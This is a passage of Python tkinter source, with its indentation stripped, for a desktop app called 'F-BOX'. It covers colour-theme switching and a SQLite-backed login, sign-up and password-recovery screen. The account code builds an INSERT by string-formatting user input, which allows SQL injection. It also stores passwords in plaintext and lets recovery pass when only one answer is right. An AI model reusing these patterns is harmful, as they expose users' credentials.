c3.configure(bg='grey',fg='white',insertbackground='white')
c4.configure(bg='grey',fg='white',insertbackground='white')
c5.configure(bg='grey',fg='white',insertbackground='white')
c6.configure(bg='grey',fg='white',insertbackground='white')
c7.configure(bg='grey',fg='white',insertbackground='white')
c8.configure(bg='grey',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='grey')
c10.configure(bg='grey',fg='white')
self.p1.configure(fg='white')
except AttributeError:
self.option.config(bg='grey',fg='white')
self.top5.config(bg='grey')
if self.data==2:
try:
self.c4.config(bg='black')
self.testy.config(bg='black')
self.c3.config(bg='black')
self.testf.config(bg='black')
self.config.config(bg='black')
self.test10.config(bg='black')
self.test9.config(bg='black')
self.testy.config(bg='black')
self.toolbar.config(bg='black')
self.toolbar2.config(bg='black')
self.f6.config(bg='black')
self.f7.config(bg='black')
self.one.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='black')
self.seven.config(bg='black')
self.eight.config(bg='black')
self.top.config(bg='black')
self.top5.config(bg='black')
self.option.config(bg='black',fg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='black',fg='white',insertbackground='white')
c1.configure(bg='black',fg='white',insertbackground='white')
c2.configure(bg='black',fg='white',insertbackground='white')
c3.configure(bg='black',fg='white',insertbackground='white')
c4.configure(bg='black',fg='white',insertbackground='white')
c5.configure(bg='black',fg='white',insertbackground='white')
c6.configure(bg='black',fg='white',insertbackground='white')
c7.configure(bg='black',fg='white',insertbackground='white')
c8.configure(bg='black',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='black')
c10.configure(bg='black',fg='white')
self.p1.configure(fg='white')
except AttributeError:
self.option.config(bg='black',fg='white')
self.top5.config(bg='black')
if self.data==3:
try:
self.c4.config(bg='#151930')
self.testy.config(bg='#151930')
self.c3.config(bg='#151930')
self.testf.config(bg='#151930')
self.config.config(bg='#151930')
self.test10.config(bg='#151930')
self.test9.config(bg='#151930')
self.testy.config(bg='#151930')
self.toolbar.config(bg='#151930')
self.toolbar2.config(bg='#151930')
self.f6.config(bg='#151930')
self.f7.config(bg='#151930')
self.one.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='#151930')
self.seven.config(bg='#151930')
self.eight.config(bg='#151930')
self.top.config(bg='#151930')
self.top5.config(bg='#151930')
self.option.config(bg='#151930',fg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='#151930',fg='white',insertbackground='white')
c1.configure(bg='#151930',fg='white',insertbackground='white')
c2.configure(bg='#151930',fg='white',insertbackground='white')
c3.configure(bg='#151930',fg='white',insertbackground='white')
c4.configure(bg='#151930',fg='white',insertbackground='white')
c5.configure(bg='#151930',fg='white',insertbackground='white')
c6.configure(bg='#151930',fg='white',insertbackground='white')
c7.configure(bg='#151930',fg='white',insertbackground='white')
c8.configure(bg='#151930',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='#151930')
c10.configure(bg='#151930',fg='white')
self.p1.configure(fg='white')
except AttributeError:
self.option.config(bg='#151930',fg='white')
self.top5.config(bg='#151930')
if self.data==4:
try:
self.c4.config(bg='white')
self.testy.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.test9.config(bg='white')
self.testy.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
self.top.config(bg='white')
self.top5.config(bg='white')
self.option.config(bg='white',fg='black')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='white',fg='black',insertbackground='black')
c1.configure(bg='white',fg='black',insertbackground='black')
c2.configure(bg='white',fg='black',insertbackground='black')
c3.configure(bg='white',fg='black',insertbackground='black')
c4.configure(bg='white',fg='black',insertbackground='black')
c5.configure(bg='white',fg='black',insertbackground='black')
c6.configure(bg='white',fg='black',insertbackground='black')
c7.configure(bg='white',fg='black',insertbackground='black')
c8.configure(bg='white',fg='black',insertbackground='black')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white',fg='black')
self.p1.configure(fg='black')
except AttributeError:
self.option.config(bg='white',fg='black')
self.top5.config(bg='white')
#function to change the settings menu theme
def config_themes2(self):
if self.data==0:
self.top5.config(bg='white')
self.option.config(bg='white',fg='black')
if self.data==1:
self.top5.configure(bg='grey')
self.option.config(bg='grey',fg='white')
if self.data==2:
self.top5.config(bg='black')
self.option.config(bg='black',fg='white')
if self.data==3:
self.top5.config(bg='#151930')
self.option.config(bg='#151930',fg='white')
if self.data==4:
self.top5.config(bg='white')
self.option.config(bg='white',fg='black')
#function to change the F-analysis theme
def config_themes5(self):
try:
if self.data==0:
self.c4.config(bg='white')
self.testy.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.top.config(bg='white')
self.test9.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(fg='black',bg='white')
c1.configure(fg='black',bg='white')
c2.configure(fg='black',bg='white')
c3.configure(fg='black',bg='white')
c4.configure(fg='black',bg='white')
c5.configure(fg='black',bg='white')
c6.configure(fg='black',bg='white')
c7.configure(fg='black',bg='white')
c8.configure(fg='black',bg='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white')
self.p1.configure(fg='black')
if self.data==1:
self.c4.config(bg='grey')
self.c3.config(bg='grey')
self.testf.config(bg='grey')
self.testy.config(bg='grey')
self.config.config(bg='grey')
self.test10.config(bg='grey')
self.toolbar.config(bg='grey')
self.toolbar2.config(bg='grey')
self.test9.config(bg='grey')
self.f6.config(bg='grey')
self.f7.config(bg='grey')
self.one.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.two.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.three.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.four.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.five.config(bg='grey',fg='white',activebackground='black',activeforeground='white')
self.six.config(bg='grey')
self.seven.config(bg='grey')
self.eight.config(bg='grey')
self.top.config(bg='grey')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='grey',fg='white')
c1.configure(bg='grey',fg='white')
c2.configure(bg='grey',fg='white')
c3.configure(bg='grey',fg='white')
c4.configure(bg='grey',fg='white')
c5.configure(bg='grey',fg='white')
c6.configure(bg='grey',fg='white')
c7.configure(bg='grey',fg='white')
c8.configure(bg='grey',fg='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='grey')
c10.configure(bg='grey',fg='white')
self.p1.configure(fg='white')
if self.data==2:
self.c4.config(bg='black')
self.c3.config(bg='black')
self.testf.config(bg='black')
self.testy.config(bg='black')
self.config.config(bg='black')
self.test10.config(bg='black')
self.toolbar.config(bg='black')
self.toolbar2.config(bg='black')
self.test9.config(bg='black')
self.f6.config(bg='black')
self.f7.config(bg='black')
self.one.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='black',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='black')
self.seven.config(bg='black')
self.eight.config(bg='black')
self.top.config(bg='black')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='black',fg='white',insertbackground='white')
c1.configure(bg='black',fg='white',insertbackground='white')
c2.configure(bg='black',fg='white',insertbackground='white')
c3.configure(bg='black',fg='white',insertbackground='white')
c4.configure(bg='black',fg='white',insertbackground='white')
c5.configure(bg='black',fg='white',insertbackground='white')
c6.configure(bg='black',fg='white',insertbackground='white')
c7.configure(bg='black',fg='white',insertbackground='white')
c8.configure(bg='black',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='black')
c10.configure(bg='black',fg='white')
self.p1.configure(fg='white')
if self.data==3:
self.c4.config(bg='#151930')
self.c3.config(bg='#151930')
self.testy.config(bg='#151930')
self.testf.config(bg='#151930')
self.config.config(bg='#151930')
self.test10.config(bg='#151930')
self.toolbar.config(bg='#151930')
self.toolbar2.config(bg='#151930')
self.test9.config(bg='#151930')
self.f6.config(bg='#151930')
self.f7.config(bg='#151930')
self.one.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.two.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.three.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.four.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.five.config(bg='#151930',fg='white',activebackground='grey',activeforeground='white')
self.six.config(bg='#151930')
self.seven.config(bg='#151930')
self.eight.config(bg='#151930')
self.top.config(bg='#151930')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='#151930',fg='white',insertbackground='white')
c1.configure(bg='#151930',fg='white',insertbackground='white')
c2.configure(bg='#151930',fg='white',insertbackground='white')
c3.configure(bg='#151930',fg='white',insertbackground='white')
c4.configure(bg='#151930',fg='white',insertbackground='white')
c5.configure(bg='#151930',fg='white',insertbackground='white')
c6.configure(bg='#151930',fg='white',insertbackground='white')
c7.configure(bg='#151930',fg='white',insertbackground='white')
c8.configure(bg='#151930',fg='white',insertbackground='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='#151930')
c10.configure(bg='#151930',fg='white')
self.p1.configure(fg='white')
if self.data==4:
self.c4.config(bg='white')
self.c3.config(bg='white')
self.testf.config(bg='white')
self.testy.config(bg='white')
self.config.config(bg='white')
self.test10.config(bg='white')
self.toolbar.config(bg='white')
self.toolbar2.config(bg='white')
self.test9.config(bg='white')
self.f6.config(bg='white')
self.f7.config(bg='white')
self.one.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.two.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.three.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.four.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.five.config(bg='white',fg='black',activebackground='grey',activeforeground='white')
self.six.config(bg='white')
self.seven.config(bg='white')
self.eight.config(bg='white')
self.top.config(bg='white')
for c,c1,c2,c3,c4,c5,c6,c7,c8 in zip(kist,list2,list3,list4,list5,list6,list7,list8,list9):
c.configure(bg='white',fg='black')
c1.configure(bg='white',fg='black')
c2.configure(bg='white',fg='black')
c3.configure(bg='white',fg='black')
c4.configure(bg='white',fg='black')
c5.configure(bg='white',fg='black')
c6.configure(bg='white',fg='black')
c7.configure(bg='white',fg='black')
c8.configure(fg='black',bg='white')
for c9,c10 in zip(h10,h11):
c9.configure(bg='white')
c10.configure(bg='white',fg='black')
self.p1.configure(fg='black')
except TclError:
pass
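#apply the current theme to the credential-recovery labels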
def config_themes6(self):
if self.data==0:
self.rec1.config(bg='white',fg='black')
self.rec3.config(bg='white',fg='black')
self.rec6.config(bg='white',fg='black')
if self.data==1:
self.rec1.config(bg='grey',fg='white')
self.rec3.config(bg='grey',fg='white')
self.rec6.config(bg='grey',fg='white')
if self.data==2:
self.rec1.config(bg='black',fg='white')
self.rec3.config(bg='black',fg='white')
self.rec6.config(bg='black',fg='white')
if self.data==3:
self.rec1.config(bg='#151930',fg='white')
self.rec3.config(bg='#151930',fg='white')
self.rec6.config(bg='#151930',fg='white')
if self.data==4:
self.rec1.config(bg='white',fg='black')
self.rec3.config(bg='white',fg='black')
self.rec6.config(bg='white',fg='black')
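#apply the current theme to the clear/save buttons shown while editing the cell rows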
def config_themes7(self):
if self.data==0:
self.cle.config(bg='white',activebackground='#8193F7')
self.sav.config(bg='white',activebackground='#8193F7')
if self.data==1:
self.cle.config(bg='grey',activebackground='#F0F4FF')
self.sav.config(bg='grey',activebackground='#F0F4FF')
if self.data==2:
self.cle.config(bg='black',activebackground='#969AA8')
self.sav.config(bg='black',activebackground='#969AA8')
if self.data==3:
self.cle.config(bg='#151930',activebackground='#1D2761')
self.sav.config(bg='#151930',activebackground='#1D2761')
if self.data==4:
self.cle.config(bg='white',activebackground='#8193F7')
self.sav.config(bg='white',activebackground='#8193F7')
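#apply the current theme to the cle1/sav1 clear/save buttons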
def config_themes8(self):
if self.data==0:
self.cle1.config(bg='white',activebackground='#8193F7')
self.sav1.config(bg='white',activebackground='#8193F7')
if self.data==1:
self.cle1.config(bg='grey',activebackground='#F0F4FF')
self.sav1.config(bg='grey',activebackground='#F0F4FF')
if self.data==2:
self.cle1.config(bg='black',activebackground='#969AA8')
self.sav1.config(bg='black',activebackground='#969AA8')
if self.data==3:
self.cle1.config(bg='#151930',activebackground='#1D2761')
self.sav1.config(bg='#151930',activebackground='#1D2761')
if self.data==4:
self.cle1.config(bg='white',activebackground='#8193F7')
self.sav1.config(bg='white',activebackground='#8193F7')
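#close the main window and the root window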
def close(self,event):
self.top.destroy()
root.destroy()
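#window-resize handler: runs the update routines in background threads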
def master_update(self,event):
#self.top.update()
t2=threading.Thread(target=self.update).start()
t1=threading.Thread(target=self.update2).start()
#threading.Thread(target=lambda:sleep(1)).start()
#t2=threading.Thread(target=self.update2)
#t2.start()
#t2.join()
#self.update2()
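#recompute the window size and rescale the config image and the back-button font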
def update(self):
self.width=self.top.winfo_width()-1
self.height=self.top.winfo_height()-1
self.v.set(round(0.00625*self.width))
#self.top.update()
self.cong=ImageTk.PhotoImage(self.confi.resize((round(self.width/7.84),round(self.height/36))))
self.config.configure(image=self.cong)
self.back.config(font=('helvectica',self.v.get(),'bold'))
def update2(self):
self.top.update()
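#use the Win32 API to make the toolwindow appear in the taskbar, then re-show the window and focus the first cell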
def forcer(self):
j=ctypes.windll.user32.GetParent(self.top.winfo_id())
style=ctypes.windll.user32.GetWindowLongPtrW(j,GWL_EXSTYLE)
style=style & -WS_EX_TOOLWINDOW
style=style | WS_EX_APPWINDOW
res=ctypes.windll.user32.SetWindowLongPtrW(j,GWL_EXSTYLE,style)
self.top.withdraw()
self.top.after(10,lambda:self.top.deiconify())
kist[0].focus_set()
#login screen shown before the core of the app is used
class Login(Financial):
def __init__(self,object):
self.show=object.showit
self.data=object.data
self.myframe=object.myframe
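#build the borderless login/sign-up splash screen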
def splash(self):
self.z=0
self.track2=1
self.splash_frame=Frame(root,bg='white')
screen1=root.winfo_screenwidth()
screen2=root.winfo_screenheight()
splash_width=round(root.winfo_screenwidth()/1.92)
splash_height=round(root.winfo_screenheight()/1.54)
p = Image.open(r"D:\FES2.png")
p = p.resize((50, 50))
self.toolwindow1=Canvas(root,width=splash_width,height=40,bg='black',highlightthickness=0)
self.toolwindow=Frame(self.toolwindow1,bg='black')
self.toolwindow1.grid(row=0,column=0,sticky='n')
self.destr=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\term.png")
self.mini=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\term2.png")
self.destr=ImageTk.PhotoImage(self.destr)
self.mini=ImageTk.PhotoImage(self.mini)
self.cancel=Button(self.toolwindow,image=self.destr,bd=0,borderwidth=0,command=lambda:root.destroy())
self.cancel.grid(row=0,column=9,sticky='e')
self.minimize=Button(self.toolwindow,image=self.mini,bd=0,borderwidth=0,command=self.resize)
self.minimize.grid(row=0,column=4,sticky='we',padx=round(root.winfo_screenwidth()/73.84))
self.cancel.bind('<Enter>',self.hover2)
self.cancel.bind('<Leave>',self.hover3)
self.minimize.bind('<Enter>',self.hover2)
self.minimize.bind('<Leave>',self.hover3)
p = ImageTk.PhotoImage(p)
root.iconphoto(False, p)
root.geometry("{}x{}+{}+{}".format(splash_width,splash_height,round((root.winfo_screenwidth()/2)-(splash_width/2)),
round((root.winfo_screenheight()/2)-(splash_height/2))))
root.title('F-BOX')
root.config(bg='white')
self.showb=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\show.png")
self.showb=ImageTk.PhotoImage(self.showb)
self.showc=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\show2.png")
self.showc=ImageTk.PhotoImage(self.showc)
self.logic=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\log.png")
self.logic=ImageTk.PhotoImage(self.logic)
self.creatic=Image.open(r"C:\Users\PASCAL\Desktop\FES Project\project 1\create.png")
self.creatic=ImageTk.PhotoImage(self.creatic)
#FES logo set-up and placement, referenced in the initialisation function
self.show.config(bg='white')
self.show.grid(row=1,column=0,sticky='n',pady=round(root.winfo_screenheight()/36),padx=round(root.winfo_screenwidth()/24))
root.resizable(0,0)
self.string=StringVar()
root.overrideredirect(True)
self.username = Entry(self.splash_frame, font=('helvectica', round(screen1*0.00678)), width=10)
self.l = Label(self.splash_frame, text='Enter Username', bg='white', fg='black')
self.l.grid(row=1, column=8, sticky='ns')
self.l2 = Label(self.splash_frame, text='Enter Password', bg='white', fg='black')
self.l2.grid(row=2, column=8, sticky='ns')
self.username.grid(row=1, column=9, sticky='ns', pady=5)
self.password = Entry(self.splash_frame,textvariable=self.string,font=('helvectica', round(screen1*0.00678)), width=10, show='*')
self.password.grid(row=2, column=9, sticky='ns', pady=5)
self.phone=Entry(self.splash_frame,font=('Helvectica', round(screen1*0.00678)),width=12)
self.l3=Label(self.splash_frame,text='Enter Phone Number',bg='white',fg='black')
self.hubby=Entry(self.splash_frame,font=('Helvectica', round(screen1*0.00678)),width=12)
self.l4=Label(self.splash_frame,text='Your Hubby',bg='white',fg='black')
self.l5=Label(self.splash_frame,text='* ALL FIELDS ARE REQUIRED',bg='white',fg='black')
self.visible=Button(self.splash_frame,image=self.showc,font=('Helvectica',5),command=self.visibility,borderwidth=0,bd=0)
self.sp2=Frame(self.splash_frame,bg='white')
self.loginb=Button(self.splash_frame,image=self.logic,bd=0,borderwidth=0,command=lambda e='i':self.logined(e))
self.logb=Button(self.sp2,image=self.creatic,bd=0,borderwidth=0,command=lambda event='e':self.create(event))
self.reg=Label(self.splash_frame,text='Sign Up',font=('helvectical',15,'bold'),bg='white',fg='blue')
self.login=Label(self.splash_frame,text='Login',font=('helvectical',20,'bold'),bg='white',fg='green')
#if the account database file does not exist yet, it is created;
#otherwise the stored account credentials are loaded
if path.exists('account.db')==False:
account=sqlite3.connect('account.db')
connet=account.cursor()
connet.execute("CREATE TABLE account(name TEXT,password TEXT,phone TEXT,hubby TEXT)")
account.commit()
account.close()
if path.exists('account.db')==True:
account=sqlite3.connect('account.db')
connet=account.cursor()
cred1=connet.execute("SELECT name FROM account").fetchall()
account.commit()
account.close()
if len(cred1)>0:
self.regi=self.password.register(self.verify)
self.username.insert(0,cred1[0][0])
self.password.config(validate='key',validatecommand=(self.regi,'%V'))
self.login.grid(row=0,column=8,sticky='ns')
self.loginb.grid(row=4,column=8,sticky='ns')
self.visible.grid(row=2,column=10,sticky='ns')
self.password.focus_set()
self.id1=self.password.bind('<Return>',self.logined,'+')
print(self.password.index('insert'))
#if no account has been created yet, show the sign-up fields
if len(cred1)==0:
self.l5.grid(row=0,column= 9,sticky='w')
self.username.config(validate='all',validatecommand=self.reg)
self.reg.grid(row=0,column=8,sticky='ns')
self.logb.grid(row=4,column=8,sticky='ns')
self.sp2.grid(row=5,column=8,sticky='ns')
self.phone.grid(row=3,column=9,sticky='ns',pady=5,padx=9)
self.l3.grid(row=3,column=8,sticky='ns',pady=5,padx=9)
self.l4.grid(row=4,column=8,sticky='ns',pady=5)
self.hubby.grid(row=4,column=9,sticky='ns',pady=5)
self.visible.grid(row=2,column=10,sticky='ns')
self.username.focus_set()
self.id2=root.bind('<Return>',self.create,'+')
#shared layout of the username/password entries for both sign-up and login
self.toolwindow1.update_idletasks()
self.toolwindow1.create_window(round(screen1/2.07),round(screen2/120),anchor='n',window=self.toolwindow)
self.splash_frame.grid(row=2,sticky='ns')
self.config_themes3()
self.id4=self.toolwindow1.bind('<B1-Motion>',self.move2)
self.id5=self.toolwindow1.bind('<ButtonPress-1>',self.move)
self.id6=root.bind('<Map>',self.framed)
root.update()
root.after_idle(root.focus_force)
#login handler triggered by the login button or the Return key
def logined(self,e):
screen1=root.winfo_screenwidth()
screen2=root.winfo_screenheight()
p = Image.open(r"D:\FES2.png")
p = p.resize((50, 50))
p = ImageTk.PhotoImage(p)
root.iconphoto(False, p)
cred2=self.password.get()
account=sqlite3.connect('account.db')
connet=account.cursor()
mes=[c for c in connet.execute("SELECT name,password FROM account").fetchmany(2)]
self.sp=Frame(self.myframe,bg='white')
self.forgotten=Button(self.sp,text='Forgot Credentials',font=('helvectica',10,'bold'),
activebackground='green',borderwidth=0,bd=0,bg='white',fg='green',command=self.forgot)
#if the entered username or password does not match the stored credentials
if self.password.get()!=mes[0][1] or self.username.get()!=mes[0][0]:
error=showerror('Error','Username Or Password Wrong')
self.password.delete(0,'end')
self.password.config(width=10)
self.username.config(width=10)
try:
self.password.unbind('<Key>',self.id7)
self.track2=1
except:
pass
self.forgotten.grid(row=5,column=0,sticky='ns')
self.sp.grid(row=5,column=0,sticky='ns',ipadx=37)
self.myframe.grid()
#if the credentials are correct, hide the splash screen and show the main application
else:
self.splash_frame.grid_forget()
self.myframe.grid_forget()
self.sp2.grid_forget()
self.toolwindow.grid_forget()
self.toolwindow1.grid_forget()
first.display()
self.password.unbind('<Return>',self.id1)
self.config_themes4()
#when the 'create' button is triggered, perform the account creation
def create(self,event):
if len(self.username.get())>2 and len(self.password.get())>4 and len(self.phone.get())==11 and len(self.hubby.get())>3:
account=sqlite3.connect('account.db')
connet=account.cursor()
connet.execute("INSERT INTO account VALUES('{}','{}','{}','{}')".format(self.username.get(),self.password.get(),self.phone.get(),self.hubby.get()))
account.commit()
account.close()
self.splash_frame.grid_forget()
self.myframe.grid_forget()
root.unbind('<Return>',self.id2)
first.display()
#warning shown when the username, password or phone number is too short to create the account
else:
warning=showwarning('Too short',"""Username too short, password too short (must be longer than 4 characters),
or phone number invalid (must be 11 digits)""")
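#show the credential-recovery form (phone number and hubby entries)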
def forgot(self):
self.loginb.grid_forget()
self.login.grid_forget()
self.l.grid_forget()
self.l2.grid_forget()
self.username.grid_forget()
self.password.grid_forget()
self.forgotten.grid_forget()
self.visible.grid_forget()
self.rec1=Label(self.splash_frame,text='Your Phone Number')
self.rec1.grid(row=1,column=8,sticky='ns')
self.rec2=Entry(self.splash_frame,font=('Time',12),width=12)
self.rec2.grid(row=1,column=9,sticky='ns',padx=4)
self.rec3=Label(self.splash_frame,text='Your Hubby')
self.rec3.grid(row=2,column=8,sticky='ns',pady=5)
self.rec4=Entry(self.splash_frame,font=('Time',13),width=10)
self.rec4.grid(row=2,column=9,sticky='ns',pady=5)
self.rec5=Button(self.splash_frame,text='Recover',font=('Helvectica',10,'bold'),bd=9,borderwidth=1,command=lambda event='e':self.recover(event))
self.rec5.grid(row=3,column=8,sticky='ns')
self.rec6=Label(self.splash_frame,text='Confirm New Password')
self.rec7=Entry(self.splash_frame,font=('Time',13),width=13,show='*')
self.rec8=Button(self.splash_frame,text='Back',font=('Time',12),bd=9,borderwidth=2,command=self.home)
self.rec8.grid(row=3,column=9)
self.config_themes6()
self.password.unbind('<Return>',self.id1)
self.id3=root.bind('<Return>',self.recover,'+')
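#leave the recovery form and rebuild the login splash screen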
def home(self):
self.rec1.grid_forget()
self.rec2.grid_forget()
self.rec3.grid_forget()
self.rec4.grid_forget()
self.rec5.grid_forget()
self.rec6.grid_forget()
self.rec7.grid_forget()
self.rec8.grid_forget()
root.unbind('<Return>',self.id3)
root.after(10,lambda:set(root))
master.splash()
self.password.focus_set()
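#verify the phone number and hubby against the stored account, then show the new-password fields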
def recover(self,event):
account=sqlite3.connect('account.db')
connet=account.cursor()
recov=connet.execute("SELECT phone,hubby FROM account").fetchmany(2)
print(recov)
for c in recov:
self.recov1=c[0]
recov2=c[1]
if self.rec2.get()!=self.recov1 and self.rec4.get()!=recov2:
self.rec2.delete(0,'end')
self.rec4.delete(0,'end')
warning=showwarning('Wrong','Both Wrong')
else:
self.rec3.grid_forget()
self.rec4.grid_forget()
self.rec1.configure(text='Enter New Password')
self.rec2.delete(0,'end')
self.rec2.configure(width=13,show='*')
self.rec6.grid(row=2,column=8,sticky='ns',pady=5)
self.rec7.grid(row=2,column=9,sticky='ns',pady=5)
self.rec5.configure(text='Save',command=self.success)
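#save the new password if both entries match, then return to the login screen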
def success(self):
if self.rec7.get()==self.rec2.get():
account=sqlite3.connect('account.db')
connet=account.cursor()
connet.execute("UPDATE account SET password=? WHERE phone=?",(self.rec2.get(),self.recov1))
account.commit()
account.close()
self.rec1.grid_forget()
self.rec2.grid_forget()
self.rec6.grid_forget()
self.rec7.grid_forget()
self.rec5.grid_forget()
self.rec8.grid_forget()
root.after(10,lambda:set(root))
master.splash()
else:
self.rec7.delete(0,'end')
warning=showerror('Error',"Password Did Not Match!")
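#toggle the password visibility and swap the show/hide icon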
def visibility(self):
global counter
counter+=1
if self.visible:
if counter==1:
self.password.config(show='')
self.visible.config(image=self.showb)
if counter>1:
self.password.config(show='*')
self.visible.config(image=self.showc)
counter=0
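#validation callback: widen the entries as the password grows and block further input at 20 characters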
def verify(self,input):
if len(self.password.get())+1>12 and self.track2==1:
self.password.config(width=self.password.cget('width')+self.track2+1)
self.username.config(width=self.password.cget('width'))
self.id9=self.password.bind('<BackSpace>',self.function2)
if len(self.password.get())==20:
self.track=0
self.track2=0
self.id7=self.password.bind('<Key>',lambda e: 'break')
self.id8=self.password.bind('<BackSpace>',self.backspace2)
#print(3)
return True
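#on backspace after the length cap: re-enable typing and shrink both entries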
def backspace2(self,event):
try:
self.password.unbind('<Key>',self.id7)
except tkinter.TclError:
pass
self.id11=self.password.bind('<Key>',self.function4)
if self.password.cget('width')>10:
self.username.config(width=self.password.cget('width')-2)
self.password.config(width=self.password.cget('width')-2)
if self.password.cget('width')==10:
self.username.config(width=10)
self.password.config(width=10)
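#shrink both entries when backspacing while the password is being widened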
def function2(self,event):
self.track2=0
self.id10=self.password.bind('<Key>',self.function3)
if self.password.cget('width')>10:
            self.username.config(width=self.password.cget('width')-1)
            self.password.config(width=self.password.cget('width')-1)
if self.password.cget('width')==10:
self.username.config(width=10)
self.password.config(width=10)
def function3(self,event):
if event.char.isdigit() or event.char.isalpha():
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id9)
except tkinter.TclError:
pass
else:
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id9)
self.password.unbind('<BackSpace>',self.id8)
except tkinter.TclError:
pass
def function4(self,event):
if event.char.isdigit() or event.char.isalpha():
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id8)
except tkinter.TclError:
pass
else:
self.track2=1
try:
self.password.unbind('<BackSpace>',self.id8)
except tkinter.TclError:
pass
def move(self,event):
self.xp=event.x
self.yp=event.y
def move2(self,event):
deltax=event.x-self.xp
deltay=event.y-self.yp
splash_width=round(root.winfo_screenwidth()/1.92)
splash_height=round(root.winfo_screenheight()/1.54)
screen1=root.winfo_x()+deltax
screen2=root.winfo_y()+deltay
root.geometry(newGeometry='{}x{}+{}+{}'.format(splash_width,splash_height,screen1,screen2))
def resize(self):
self.z=1
root.withdraw()
root.overrideredirect(False)
root.iconify()
    def framed(self,event=None):
root.overrideredirect(True)
if self.z==1:
root.after(10,lambda:set(root))
root.update()
self.z=0
def hover2(self,button):
button.widget.config(bg='#8193F7')
def hover3(self,button):
button.widget.config(bg=self.show.cget('bg'))
#function to change the login function of the splash
def config_themes3(self):
if self.data==0:
root.config(bg='white')
self.show.config(bg='white')
self.splash_frame.config(bg='white')
self.reg.config(bg='white')
self.toolwindow.config(bg='white')
self.toolwindow1.config(bg='white')
self.cancel.config(bg='white')
self.minimize.config(bg='white')
self.visible.config(bg='white',activebackground='white')
self.login.config(bg='white')
self.logb.config(bg='white')
self.loginb.config(bg='white',activebackground='white')
self.l.config(bg='white',fg='black')
self.l2.config(bg='white',fg='black')
self.l3.config(bg='white',fg='black')
self.l4.config(bg='white',fg='black')
